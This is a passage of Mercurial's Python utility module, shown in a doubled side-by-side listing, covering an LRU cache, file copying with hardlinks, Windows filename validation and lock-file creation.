1326 self.insert(k, v)
1326 self.insert(k, v)
1327
1327
1328 def __delitem__(self, k):
1328 def __delitem__(self, k):
1329 self.pop(k)
1329 self.pop(k)
1330
1330
1331 def pop(self, k, default=_notset):
1331 def pop(self, k, default=_notset):
1332 try:
1332 try:
1333 node = self._cache.pop(k)
1333 node = self._cache.pop(k)
1334 except KeyError:
1334 except KeyError:
1335 if default is _notset:
1335 if default is _notset:
1336 raise
1336 raise
1337 return default
1337 return default
1338 value = node.value
1338 value = node.value
1339 self.totalcost -= node.cost
1339 self.totalcost -= node.cost
1340 node.markempty()
1340 node.markempty()
1341
1341
1342 # Temporarily mark as newest item before re-adjusting head to make
1342 # Temporarily mark as newest item before re-adjusting head to make
1343 # this node the oldest item.
1343 # this node the oldest item.
1344 self._movetohead(node)
1344 self._movetohead(node)
1345 self._head = node.next
1345 self._head = node.next
1346
1346
1347 return value
1347 return value
1348
1348
1349 # Additional dict methods.
1349 # Additional dict methods.
1350
1350
1351 def get(self, k, default=None):
1351 def get(self, k, default=None):
1352 try:
1352 try:
1353 return self.__getitem__(k)
1353 return self.__getitem__(k)
1354 except KeyError:
1354 except KeyError:
1355 return default
1355 return default
1356
1356
1357 def peek(self, k, default=_notset):
1357 def peek(self, k, default=_notset):
1358 """Get the specified item without moving it to the head
1358 """Get the specified item without moving it to the head
1359
1359
1360 Unlike get(), this doesn't mutate the internal state. But be aware
1360 Unlike get(), this doesn't mutate the internal state. But be aware
1361 that it doesn't mean peek() is thread safe.
1361 that it doesn't mean peek() is thread safe.
1362 """
1362 """
1363 try:
1363 try:
1364 node = self._cache[k]
1364 node = self._cache[k]
1365 return node.value
1365 return node.value
1366 except KeyError:
1366 except KeyError:
1367 if default is _notset:
1367 if default is _notset:
1368 raise
1368 raise
1369 return default
1369 return default
1370
1370
1371 def clear(self):
1371 def clear(self):
1372 n = self._head
1372 n = self._head
1373 while n.key is not _notset:
1373 while n.key is not _notset:
1374 self.totalcost -= n.cost
1374 self.totalcost -= n.cost
1375 n.markempty()
1375 n.markempty()
1376 n = n.next
1376 n = n.next
1377
1377
1378 self._cache.clear()
1378 self._cache.clear()
1379
1379
1380 def copy(self, capacity=None, maxcost=0):
1380 def copy(self, capacity=None, maxcost=0):
1381 """Create a new cache as a copy of the current one.
1381 """Create a new cache as a copy of the current one.
1382
1382
1383 By default, the new cache has the same capacity as the existing one.
1383 By default, the new cache has the same capacity as the existing one.
1384 But, the cache capacity can be changed as part of performing the
1384 But, the cache capacity can be changed as part of performing the
1385 copy.
1385 copy.
1386
1386
1387 Items in the copy have an insertion/access order matching this
1387 Items in the copy have an insertion/access order matching this
1388 instance.
1388 instance.
1389 """
1389 """
1390
1390
1391 capacity = capacity or self.capacity
1391 capacity = capacity or self.capacity
1392 maxcost = maxcost or self.maxcost
1392 maxcost = maxcost or self.maxcost
1393 result = lrucachedict(capacity, maxcost=maxcost)
1393 result = lrucachedict(capacity, maxcost=maxcost)
1394
1394
1395 # We copy entries by iterating in oldest-to-newest order so the copy
1395 # We copy entries by iterating in oldest-to-newest order so the copy
1396 # has the correct ordering.
1396 # has the correct ordering.
1397
1397
1398 # Find the first non-empty entry.
1398 # Find the first non-empty entry.
1399 n = self._head.prev
1399 n = self._head.prev
1400 while n.key is _notset and n is not self._head:
1400 while n.key is _notset and n is not self._head:
1401 n = n.prev
1401 n = n.prev
1402
1402
1403 # We could potentially skip the first N items when decreasing capacity.
1403 # We could potentially skip the first N items when decreasing capacity.
1404 # But let's keep it simple unless it is a performance problem.
1404 # But let's keep it simple unless it is a performance problem.
1405 for i in range(len(self._cache)):
1405 for i in range(len(self._cache)):
1406 result.insert(n.key, n.value, cost=n.cost)
1406 result.insert(n.key, n.value, cost=n.cost)
1407 n = n.prev
1407 n = n.prev
1408
1408
1409 return result
1409 return result
1410
1410
1411 def popoldest(self):
1411 def popoldest(self):
1412 """Remove the oldest item from the cache.
1412 """Remove the oldest item from the cache.
1413
1413
1414 Returns the (key, value) describing the removed cache entry.
1414 Returns the (key, value) describing the removed cache entry.
1415 """
1415 """
1416 if not self._cache:
1416 if not self._cache:
1417 return
1417 return
1418
1418
1419 # Walk the linked list backwards starting at tail node until we hit
1419 # Walk the linked list backwards starting at tail node until we hit
1420 # a non-empty node.
1420 # a non-empty node.
1421 n = self._head.prev
1421 n = self._head.prev
1422 while n.key is _notset:
1422 while n.key is _notset:
1423 n = n.prev
1423 n = n.prev
1424
1424
1425 key, value = n.key, n.value
1425 key, value = n.key, n.value
1426
1426
1427 # And remove it from the cache and mark it as empty.
1427 # And remove it from the cache and mark it as empty.
1428 del self._cache[n.key]
1428 del self._cache[n.key]
1429 self.totalcost -= n.cost
1429 self.totalcost -= n.cost
1430 n.markempty()
1430 n.markempty()
1431
1431
1432 return key, value
1432 return key, value
1433
1433
1434 def _movetohead(self, node):
1434 def _movetohead(self, node):
1435 """Mark a node as the newest, making it the new head.
1435 """Mark a node as the newest, making it the new head.
1436
1436
1437 When a node is accessed, it becomes the freshest entry in the LRU
1437 When a node is accessed, it becomes the freshest entry in the LRU
1438 list, which is denoted by self._head.
1438 list, which is denoted by self._head.
1439
1439
1440 Visually, let's make ``N`` the new head node (* denotes head):
1440 Visually, let's make ``N`` the new head node (* denotes head):
1441
1441
1442 previous/oldest <-> head <-> next/next newest
1442 previous/oldest <-> head <-> next/next newest
1443
1443
1444 ----<->--- A* ---<->-----
1444 ----<->--- A* ---<->-----
1445 | |
1445 | |
1446 E <-> D <-> N <-> C <-> B
1446 E <-> D <-> N <-> C <-> B
1447
1447
1448 To:
1448 To:
1449
1449
1450 ----<->--- N* ---<->-----
1450 ----<->--- N* ---<->-----
1451 | |
1451 | |
1452 E <-> D <-> C <-> B <-> A
1452 E <-> D <-> C <-> B <-> A
1453
1453
1454 This requires the following moves:
1454 This requires the following moves:
1455
1455
1456 C.next = D (node.prev.next = node.next)
1456 C.next = D (node.prev.next = node.next)
1457 D.prev = C (node.next.prev = node.prev)
1457 D.prev = C (node.next.prev = node.prev)
1458 E.next = N (head.prev.next = node)
1458 E.next = N (head.prev.next = node)
1459 N.prev = E (node.prev = head.prev)
1459 N.prev = E (node.prev = head.prev)
1460 N.next = A (node.next = head)
1460 N.next = A (node.next = head)
1461 A.prev = N (head.prev = node)
1461 A.prev = N (head.prev = node)
1462 """
1462 """
1463 head = self._head
1463 head = self._head
1464 # C.next = D
1464 # C.next = D
1465 node.prev.next = node.next
1465 node.prev.next = node.next
1466 # D.prev = C
1466 # D.prev = C
1467 node.next.prev = node.prev
1467 node.next.prev = node.prev
1468 # N.prev = E
1468 # N.prev = E
1469 node.prev = head.prev
1469 node.prev = head.prev
1470 # N.next = A
1470 # N.next = A
1471 # It is tempting to do just "head" here, however if node is
1471 # It is tempting to do just "head" here, however if node is
1472 # adjacent to head, this will do bad things.
1472 # adjacent to head, this will do bad things.
1473 node.next = head.prev.next
1473 node.next = head.prev.next
1474 # E.next = N
1474 # E.next = N
1475 node.next.prev = node
1475 node.next.prev = node
1476 # A.prev = N
1476 # A.prev = N
1477 node.prev.next = node
1477 node.prev.next = node
1478
1478
1479 self._head = node
1479 self._head = node
1480
1480
1481 def _addcapacity(self):
1481 def _addcapacity(self):
1482 """Add a node to the circular linked list.
1482 """Add a node to the circular linked list.
1483
1483
1484 The new node is inserted before the head node.
1484 The new node is inserted before the head node.
1485 """
1485 """
1486 head = self._head
1486 head = self._head
1487 node = _lrucachenode()
1487 node = _lrucachenode()
1488 head.prev.next = node
1488 head.prev.next = node
1489 node.prev = head.prev
1489 node.prev = head.prev
1490 node.next = head
1490 node.next = head
1491 head.prev = node
1491 head.prev = node
1492 self._size += 1
1492 self._size += 1
1493 return node
1493 return node
1494
1494
1495 def _enforcecostlimit(self):
1495 def _enforcecostlimit(self):
1496 # This should run after an insertion. It should only be called if total
1496 # This should run after an insertion. It should only be called if total
1497 # cost limits are being enforced.
1497 # cost limits are being enforced.
1498 # The most recently inserted node is never evicted.
1498 # The most recently inserted node is never evicted.
1499 if len(self) <= 1 or self.totalcost <= self.maxcost:
1499 if len(self) <= 1 or self.totalcost <= self.maxcost:
1500 return
1500 return
1501
1501
1502 # This is logically equivalent to calling popoldest() until we
1502 # This is logically equivalent to calling popoldest() until we
1503 # free up enough cost. We don't do that since popoldest() needs
1503 # free up enough cost. We don't do that since popoldest() needs
1504 # to walk the linked list and doing this in a loop would be
1504 # to walk the linked list and doing this in a loop would be
1505 # quadratic. So we find the first non-empty node and then
1505 # quadratic. So we find the first non-empty node and then
1506 # walk nodes until we free up enough capacity.
1506 # walk nodes until we free up enough capacity.
1507 #
1507 #
1508 # If we only removed the minimum number of nodes to free enough
1508 # If we only removed the minimum number of nodes to free enough
1509 # cost at insert time, chances are high that the next insert would
1509 # cost at insert time, chances are high that the next insert would
1510 # also require pruning. This would effectively constitute quadratic
1510 # also require pruning. This would effectively constitute quadratic
1511 # behavior for insert-heavy workloads. To mitigate this, we set a
1511 # behavior for insert-heavy workloads. To mitigate this, we set a
1512 # target cost that is a percentage of the max cost. This will tend
1512 # target cost that is a percentage of the max cost. This will tend
1513 # to free more nodes when the high water mark is reached, which
1513 # to free more nodes when the high water mark is reached, which
1514 # lowers the chances of needing to prune on the subsequent insert.
1514 # lowers the chances of needing to prune on the subsequent insert.
1515 targetcost = int(self.maxcost * 0.75)
1515 targetcost = int(self.maxcost * 0.75)
1516
1516
1517 n = self._head.prev
1517 n = self._head.prev
1518 while n.key is _notset:
1518 while n.key is _notset:
1519 n = n.prev
1519 n = n.prev
1520
1520
1521 while len(self) > 1 and self.totalcost > targetcost:
1521 while len(self) > 1 and self.totalcost > targetcost:
1522 del self._cache[n.key]
1522 del self._cache[n.key]
1523 self.totalcost -= n.cost
1523 self.totalcost -= n.cost
1524 n.markempty()
1524 n.markempty()
1525 n = n.prev
1525 n = n.prev
1526
1526
1527 def lrucachefunc(func):
1527 def lrucachefunc(func):
1528 '''cache most recent results of function calls'''
1528 '''cache most recent results of function calls'''
1529 cache = {}
1529 cache = {}
1530 order = collections.deque()
1530 order = collections.deque()
1531 if func.__code__.co_argcount == 1:
1531 if func.__code__.co_argcount == 1:
1532 def f(arg):
1532 def f(arg):
1533 if arg not in cache:
1533 if arg not in cache:
1534 if len(cache) > 20:
1534 if len(cache) > 20:
1535 del cache[order.popleft()]
1535 del cache[order.popleft()]
1536 cache[arg] = func(arg)
1536 cache[arg] = func(arg)
1537 else:
1537 else:
1538 order.remove(arg)
1538 order.remove(arg)
1539 order.append(arg)
1539 order.append(arg)
1540 return cache[arg]
1540 return cache[arg]
1541 else:
1541 else:
1542 def f(*args):
1542 def f(*args):
1543 if args not in cache:
1543 if args not in cache:
1544 if len(cache) > 20:
1544 if len(cache) > 20:
1545 del cache[order.popleft()]
1545 del cache[order.popleft()]
1546 cache[args] = func(*args)
1546 cache[args] = func(*args)
1547 else:
1547 else:
1548 order.remove(args)
1548 order.remove(args)
1549 order.append(args)
1549 order.append(args)
1550 return cache[args]
1550 return cache[args]
1551
1551
1552 return f
1552 return f
1553
1553
1554 class propertycache(object):
1554 class propertycache(object):
1555 def __init__(self, func):
1555 def __init__(self, func):
1556 self.func = func
1556 self.func = func
1557 self.name = func.__name__
1557 self.name = func.__name__
1558 def __get__(self, obj, type=None):
1558 def __get__(self, obj, type=None):
1559 result = self.func(obj)
1559 result = self.func(obj)
1560 self.cachevalue(obj, result)
1560 self.cachevalue(obj, result)
1561 return result
1561 return result
1562
1562
1563 def cachevalue(self, obj, value):
1563 def cachevalue(self, obj, value):
1564 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1564 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1565 obj.__dict__[self.name] = value
1565 obj.__dict__[self.name] = value
1566
1566
1567 def clearcachedproperty(obj, prop):
1567 def clearcachedproperty(obj, prop):
1568 '''clear a cached property value, if one has been set'''
1568 '''clear a cached property value, if one has been set'''
1569 prop = pycompat.sysstr(prop)
1569 prop = pycompat.sysstr(prop)
1570 if prop in obj.__dict__:
1570 if prop in obj.__dict__:
1571 del obj.__dict__[prop]
1571 del obj.__dict__[prop]
1572
1572
1573 def increasingchunks(source, min=1024, max=65536):
1573 def increasingchunks(source, min=1024, max=65536):
1574 '''return no less than min bytes per chunk while data remains,
1574 '''return no less than min bytes per chunk while data remains,
1575 doubling min after each chunk until it reaches max'''
1575 doubling min after each chunk until it reaches max'''
1576 def log2(x):
1576 def log2(x):
1577 if not x:
1577 if not x:
1578 return 0
1578 return 0
1579 i = 0
1579 i = 0
1580 while x:
1580 while x:
1581 x >>= 1
1581 x >>= 1
1582 i += 1
1582 i += 1
1583 return i - 1
1583 return i - 1
1584
1584
1585 buf = []
1585 buf = []
1586 blen = 0
1586 blen = 0
1587 for chunk in source:
1587 for chunk in source:
1588 buf.append(chunk)
1588 buf.append(chunk)
1589 blen += len(chunk)
1589 blen += len(chunk)
1590 if blen >= min:
1590 if blen >= min:
1591 if min < max:
1591 if min < max:
1592 min = min << 1
1592 min = min << 1
1593 nmin = 1 << log2(blen)
1593 nmin = 1 << log2(blen)
1594 if nmin > min:
1594 if nmin > min:
1595 min = nmin
1595 min = nmin
1596 if min > max:
1596 if min > max:
1597 min = max
1597 min = max
1598 yield ''.join(buf)
1598 yield ''.join(buf)
1599 blen = 0
1599 blen = 0
1600 buf = []
1600 buf = []
1601 if buf:
1601 if buf:
1602 yield ''.join(buf)
1602 yield ''.join(buf)
1603
1603
1604 def always(fn):
1604 def always(fn):
1605 return True
1605 return True
1606
1606
1607 def never(fn):
1607 def never(fn):
1608 return False
1608 return False
1609
1609
1610 def nogc(func):
1610 def nogc(func):
1611 """disable garbage collector
1611 """disable garbage collector
1612
1612
1613 Python's garbage collector triggers a GC each time a certain number of
1613 Python's garbage collector triggers a GC each time a certain number of
1614 container objects (the number being defined by gc.get_threshold()) are
1614 container objects (the number being defined by gc.get_threshold()) are
1615 allocated even when marked not to be tracked by the collector. Tracking has
1615 allocated even when marked not to be tracked by the collector. Tracking has
1616 no effect on when GCs are triggered, only on what objects the GC looks
1616 no effect on when GCs are triggered, only on what objects the GC looks
1617 into. As a workaround, disable GC while building complex (huge)
1617 into. As a workaround, disable GC while building complex (huge)
1618 containers.
1618 containers.
1619
1619
1620 This garbage collector issue have been fixed in 2.7. But it still affect
1620 This garbage collector issue have been fixed in 2.7. But it still affect
1621 CPython's performance.
1621 CPython's performance.
1622 """
1622 """
1623 def wrapper(*args, **kwargs):
1623 def wrapper(*args, **kwargs):
1624 gcenabled = gc.isenabled()
1624 gcenabled = gc.isenabled()
1625 gc.disable()
1625 gc.disable()
1626 try:
1626 try:
1627 return func(*args, **kwargs)
1627 return func(*args, **kwargs)
1628 finally:
1628 finally:
1629 if gcenabled:
1629 if gcenabled:
1630 gc.enable()
1630 gc.enable()
1631 return wrapper
1631 return wrapper
1632
1632
1633 if pycompat.ispypy:
1633 if pycompat.ispypy:
1634 # PyPy runs slower with gc disabled
1634 # PyPy runs slower with gc disabled
1635 nogc = lambda x: x
1635 nogc = lambda x: x
1636
1636
1637 def pathto(root, n1, n2):
1637 def pathto(root, n1, n2):
1638 '''return the relative path from one place to another.
1638 '''return the relative path from one place to another.
1639 root should use os.sep to separate directories
1639 root should use os.sep to separate directories
1640 n1 should use os.sep to separate directories
1640 n1 should use os.sep to separate directories
1641 n2 should use "/" to separate directories
1641 n2 should use "/" to separate directories
1642 returns an os.sep-separated path.
1642 returns an os.sep-separated path.
1643
1643
1644 If n1 is a relative path, it's assumed it's
1644 If n1 is a relative path, it's assumed it's
1645 relative to root.
1645 relative to root.
1646 n2 should always be relative to root.
1646 n2 should always be relative to root.
1647 '''
1647 '''
1648 if not n1:
1648 if not n1:
1649 return localpath(n2)
1649 return localpath(n2)
1650 if os.path.isabs(n1):
1650 if os.path.isabs(n1):
1651 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1651 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1652 return os.path.join(root, localpath(n2))
1652 return os.path.join(root, localpath(n2))
1653 n2 = '/'.join((pconvert(root), n2))
1653 n2 = '/'.join((pconvert(root), n2))
1654 a, b = splitpath(n1), n2.split('/')
1654 a, b = splitpath(n1), n2.split('/')
1655 a.reverse()
1655 a.reverse()
1656 b.reverse()
1656 b.reverse()
1657 while a and b and a[-1] == b[-1]:
1657 while a and b and a[-1] == b[-1]:
1658 a.pop()
1658 a.pop()
1659 b.pop()
1659 b.pop()
1660 b.reverse()
1660 b.reverse()
1661 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1661 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1662
1662
1663 # the location of data files matching the source code
1663 # the location of data files matching the source code
1664 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1664 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1665 # executable version (py2exe) doesn't support __file__
1665 # executable version (py2exe) doesn't support __file__
1666 datapath = os.path.dirname(pycompat.sysexecutable)
1666 datapath = os.path.dirname(pycompat.sysexecutable)
1667 else:
1667 else:
1668 datapath = os.path.dirname(pycompat.fsencode(__file__))
1668 datapath = os.path.dirname(pycompat.fsencode(__file__))
1669
1669
1670 i18n.setdatapath(datapath)
1670 i18n.setdatapath(datapath)
1671
1671
1672 def checksignature(func):
1672 def checksignature(func):
1673 '''wrap a function with code to check for calling errors'''
1673 '''wrap a function with code to check for calling errors'''
1674 def check(*args, **kwargs):
1674 def check(*args, **kwargs):
1675 try:
1675 try:
1676 return func(*args, **kwargs)
1676 return func(*args, **kwargs)
1677 except TypeError:
1677 except TypeError:
1678 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1678 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1679 raise error.SignatureError
1679 raise error.SignatureError
1680 raise
1680 raise
1681
1681
1682 return check
1682 return check
1683
1683
1684 # a whilelist of known filesystems where hardlink works reliably
1684 # a whilelist of known filesystems where hardlink works reliably
1685 _hardlinkfswhitelist = {
1685 _hardlinkfswhitelist = {
1686 'apfs',
1686 'apfs',
1687 'btrfs',
1687 'btrfs',
1688 'ext2',
1688 'ext2',
1689 'ext3',
1689 'ext3',
1690 'ext4',
1690 'ext4',
1691 'hfs',
1691 'hfs',
1692 'jfs',
1692 'jfs',
1693 'NTFS',
1693 'NTFS',
1694 'reiserfs',
1694 'reiserfs',
1695 'tmpfs',
1695 'tmpfs',
1696 'ufs',
1696 'ufs',
1697 'xfs',
1697 'xfs',
1698 'zfs',
1698 'zfs',
1699 }
1699 }
1700
1700
1701 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1701 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1702 '''copy a file, preserving mode and optionally other stat info like
1702 '''copy a file, preserving mode and optionally other stat info like
1703 atime/mtime
1703 atime/mtime
1704
1704
1705 checkambig argument is used with filestat, and is useful only if
1705 checkambig argument is used with filestat, and is useful only if
1706 destination file is guarded by any lock (e.g. repo.lock or
1706 destination file is guarded by any lock (e.g. repo.lock or
1707 repo.wlock).
1707 repo.wlock).
1708
1708
1709 copystat and checkambig should be exclusive.
1709 copystat and checkambig should be exclusive.
1710 '''
1710 '''
1711 assert not (copystat and checkambig)
1711 assert not (copystat and checkambig)
1712 oldstat = None
1712 oldstat = None
1713 if os.path.lexists(dest):
1713 if os.path.lexists(dest):
1714 if checkambig:
1714 if checkambig:
1715 oldstat = checkambig and filestat.frompath(dest)
1715 oldstat = checkambig and filestat.frompath(dest)
1716 unlink(dest)
1716 unlink(dest)
1717 if hardlink:
1717 if hardlink:
1718 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1718 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1719 # unless we are confident that dest is on a whitelisted filesystem.
1719 # unless we are confident that dest is on a whitelisted filesystem.
1720 try:
1720 try:
1721 fstype = getfstype(os.path.dirname(dest))
1721 fstype = getfstype(os.path.dirname(dest))
1722 except OSError:
1722 except OSError:
1723 fstype = None
1723 fstype = None
1724 if fstype not in _hardlinkfswhitelist:
1724 if fstype not in _hardlinkfswhitelist:
1725 hardlink = False
1725 hardlink = False
1726 if hardlink:
1726 if hardlink:
1727 try:
1727 try:
1728 oslink(src, dest)
1728 oslink(src, dest)
1729 return
1729 return
1730 except (IOError, OSError):
1730 except (IOError, OSError):
1731 pass # fall back to normal copy
1731 pass # fall back to normal copy
1732 if os.path.islink(src):
1732 if os.path.islink(src):
1733 os.symlink(os.readlink(src), dest)
1733 os.symlink(os.readlink(src), dest)
1734 # copytime is ignored for symlinks, but in general copytime isn't needed
1734 # copytime is ignored for symlinks, but in general copytime isn't needed
1735 # for them anyway
1735 # for them anyway
1736 else:
1736 else:
1737 try:
1737 try:
1738 shutil.copyfile(src, dest)
1738 shutil.copyfile(src, dest)
1739 if copystat:
1739 if copystat:
1740 # copystat also copies mode
1740 # copystat also copies mode
1741 shutil.copystat(src, dest)
1741 shutil.copystat(src, dest)
1742 else:
1742 else:
1743 shutil.copymode(src, dest)
1743 shutil.copymode(src, dest)
1744 if oldstat and oldstat.stat:
1744 if oldstat and oldstat.stat:
1745 newstat = filestat.frompath(dest)
1745 newstat = filestat.frompath(dest)
1746 if newstat.isambig(oldstat):
1746 if newstat.isambig(oldstat):
1747 # stat of copied file is ambiguous to original one
1747 # stat of copied file is ambiguous to original one
1748 advanced = (
1748 advanced = (
1749 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1749 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1750 os.utime(dest, (advanced, advanced))
1750 os.utime(dest, (advanced, advanced))
1751 except shutil.Error as inst:
1751 except shutil.Error as inst:
1752 raise error.Abort(str(inst))
1752 raise error.Abort(str(inst))
1753
1753
1754 def copyfiles(src, dst, hardlink=None, progress=None):
1754 def copyfiles(src, dst, hardlink=None, progress=None):
1755 """Copy a directory tree using hardlinks if possible."""
1755 """Copy a directory tree using hardlinks if possible."""
1756 num = 0
1756 num = 0
1757
1757
1758 def settopic():
1758 def settopic():
1759 if progress:
1759 if progress:
1760 progress.topic = _('linking') if hardlink else _('copying')
1760 progress.topic = _('linking') if hardlink else _('copying')
1761
1761
1762 if os.path.isdir(src):
1762 if os.path.isdir(src):
1763 if hardlink is None:
1763 if hardlink is None:
1764 hardlink = (os.stat(src).st_dev ==
1764 hardlink = (os.stat(src).st_dev ==
1765 os.stat(os.path.dirname(dst)).st_dev)
1765 os.stat(os.path.dirname(dst)).st_dev)
1766 settopic()
1766 settopic()
1767 os.mkdir(dst)
1767 os.mkdir(dst)
1768 for name, kind in listdir(src):
1768 for name, kind in listdir(src):
1769 srcname = os.path.join(src, name)
1769 srcname = os.path.join(src, name)
1770 dstname = os.path.join(dst, name)
1770 dstname = os.path.join(dst, name)
1771 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1771 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1772 num += n
1772 num += n
1773 else:
1773 else:
1774 if hardlink is None:
1774 if hardlink is None:
1775 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1775 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1776 os.stat(os.path.dirname(dst)).st_dev)
1776 os.stat(os.path.dirname(dst)).st_dev)
1777 settopic()
1777 settopic()
1778
1778
1779 if hardlink:
1779 if hardlink:
1780 try:
1780 try:
1781 oslink(src, dst)
1781 oslink(src, dst)
1782 except (IOError, OSError):
1782 except (IOError, OSError):
1783 hardlink = False
1783 hardlink = False
1784 shutil.copy(src, dst)
1784 shutil.copy(src, dst)
1785 else:
1785 else:
1786 shutil.copy(src, dst)
1786 shutil.copy(src, dst)
1787 num += 1
1787 num += 1
1788 if progress:
1788 if progress:
1789 progress.increment()
1789 progress.increment()
1790
1790
1791 return hardlink, num
1791 return hardlink, num
1792
1792
1793 _winreservednames = {
1793 _winreservednames = {
1794 'con', 'prn', 'aux', 'nul',
1794 'con', 'prn', 'aux', 'nul',
1795 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1795 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1796 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1796 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1797 }
1797 }
1798 _winreservedchars = ':*?"<>|'
1798 _winreservedchars = ':*?"<>|'
1799 def checkwinfilename(path):
1799 def checkwinfilename(path):
1800 r'''Check that the base-relative path is a valid filename on Windows.
1800 r'''Check that the base-relative path is a valid filename on Windows.
1801 Returns None if the path is ok, or a UI string describing the problem.
1801 Returns None if the path is ok, or a UI string describing the problem.
1802
1802
1803 >>> checkwinfilename(b"just/a/normal/path")
1803 >>> checkwinfilename(b"just/a/normal/path")
1804 >>> checkwinfilename(b"foo/bar/con.xml")
1804 >>> checkwinfilename(b"foo/bar/con.xml")
1805 "filename contains 'con', which is reserved on Windows"
1805 "filename contains 'con', which is reserved on Windows"
1806 >>> checkwinfilename(b"foo/con.xml/bar")
1806 >>> checkwinfilename(b"foo/con.xml/bar")
1807 "filename contains 'con', which is reserved on Windows"
1807 "filename contains 'con', which is reserved on Windows"
1808 >>> checkwinfilename(b"foo/bar/xml.con")
1808 >>> checkwinfilename(b"foo/bar/xml.con")
1809 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1809 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1810 "filename contains 'AUX', which is reserved on Windows"
1810 "filename contains 'AUX', which is reserved on Windows"
1811 >>> checkwinfilename(b"foo/bar/bla:.txt")
1811 >>> checkwinfilename(b"foo/bar/bla:.txt")
1812 "filename contains ':', which is reserved on Windows"
1812 "filename contains ':', which is reserved on Windows"
1813 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1813 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1814 "filename contains '\\x07', which is invalid on Windows"
1814 "filename contains '\\x07', which is invalid on Windows"
1815 >>> checkwinfilename(b"foo/bar/bla ")
1815 >>> checkwinfilename(b"foo/bar/bla ")
1816 "filename ends with ' ', which is not allowed on Windows"
1816 "filename ends with ' ', which is not allowed on Windows"
1817 >>> checkwinfilename(b"../bar")
1817 >>> checkwinfilename(b"../bar")
1818 >>> checkwinfilename(b"foo\\")
1818 >>> checkwinfilename(b"foo\\")
1819 "filename ends with '\\', which is invalid on Windows"
1819 "filename ends with '\\', which is invalid on Windows"
1820 >>> checkwinfilename(b"foo\\/bar")
1820 >>> checkwinfilename(b"foo\\/bar")
1821 "directory name ends with '\\', which is invalid on Windows"
1821 "directory name ends with '\\', which is invalid on Windows"
1822 '''
1822 '''
1823 if path.endswith('\\'):
1823 if path.endswith('\\'):
1824 return _("filename ends with '\\', which is invalid on Windows")
1824 return _("filename ends with '\\', which is invalid on Windows")
1825 if '\\/' in path:
1825 if '\\/' in path:
1826 return _("directory name ends with '\\', which is invalid on Windows")
1826 return _("directory name ends with '\\', which is invalid on Windows")
1827 for n in path.replace('\\', '/').split('/'):
1827 for n in path.replace('\\', '/').split('/'):
1828 if not n:
1828 if not n:
1829 continue
1829 continue
1830 for c in _filenamebytestr(n):
1830 for c in _filenamebytestr(n):
1831 if c in _winreservedchars:
1831 if c in _winreservedchars:
1832 return _("filename contains '%s', which is reserved "
1832 return _("filename contains '%s', which is reserved "
1833 "on Windows") % c
1833 "on Windows") % c
1834 if ord(c) <= 31:
1834 if ord(c) <= 31:
1835 return _("filename contains '%s', which is invalid "
1835 return _("filename contains '%s', which is invalid "
1836 "on Windows") % stringutil.escapestr(c)
1836 "on Windows") % stringutil.escapestr(c)
1837 base = n.split('.')[0]
1837 base = n.split('.')[0]
1838 if base and base.lower() in _winreservednames:
1838 if base and base.lower() in _winreservednames:
1839 return _("filename contains '%s', which is reserved "
1839 return _("filename contains '%s', which is reserved "
1840 "on Windows") % base
1840 "on Windows") % base
1841 t = n[-1:]
1841 t = n[-1:]
1842 if t in '. ' and n not in '..':
1842 if t in '. ' and n not in '..':
1843 return _("filename ends with '%s', which is not allowed "
1843 return _("filename ends with '%s', which is not allowed "
1844 "on Windows") % t
1844 "on Windows") % t
1845
1845
1846 if pycompat.iswindows:
1846 if pycompat.iswindows:
1847 checkosfilename = checkwinfilename
1847 checkosfilename = checkwinfilename
1848 timer = time.clock
1848 timer = time.clock
1849 else:
1849 else:
1850 checkosfilename = platform.checkosfilename
1850 checkosfilename = platform.checkosfilename
1851 timer = time.time
1851 timer = time.time
1852
1852
1853 if safehasattr(time, "perf_counter"):
1853 if safehasattr(time, "perf_counter"):
1854 timer = time.perf_counter
1854 timer = time.perf_counter
1855
1855
1856 def makelock(info, pathname):
1856 def makelock(info, pathname):
1857 """Create a lock file atomically if possible
1857 """Create a lock file atomically if possible
1858
1858
1859 This may leave a stale lock file if symlink isn't supported and signal
1859 This may leave a stale lock file if symlink isn't supported and signal
1860 interrupt is enabled.
1860 interrupt is enabled.
1861 """
1861 """
1862 try:
1862 try:
1863 return os.symlink(info, pathname)
1863 return os.symlink(info, pathname)
1864 except OSError as why:
1864 except OSError as why:
1865 if why.errno == errno.EEXIST:
1865 if why.errno == errno.EEXIST:
1866 raise
1866 raise
1867 except AttributeError: # no symlink in os
1867 except AttributeError: # no symlink in os
1868 pass
1868 pass
1869
1869
1870 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1870 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1871 ld = os.open(pathname, flags)
1871 ld = os.open(pathname, flags)
1872 os.write(ld, info)
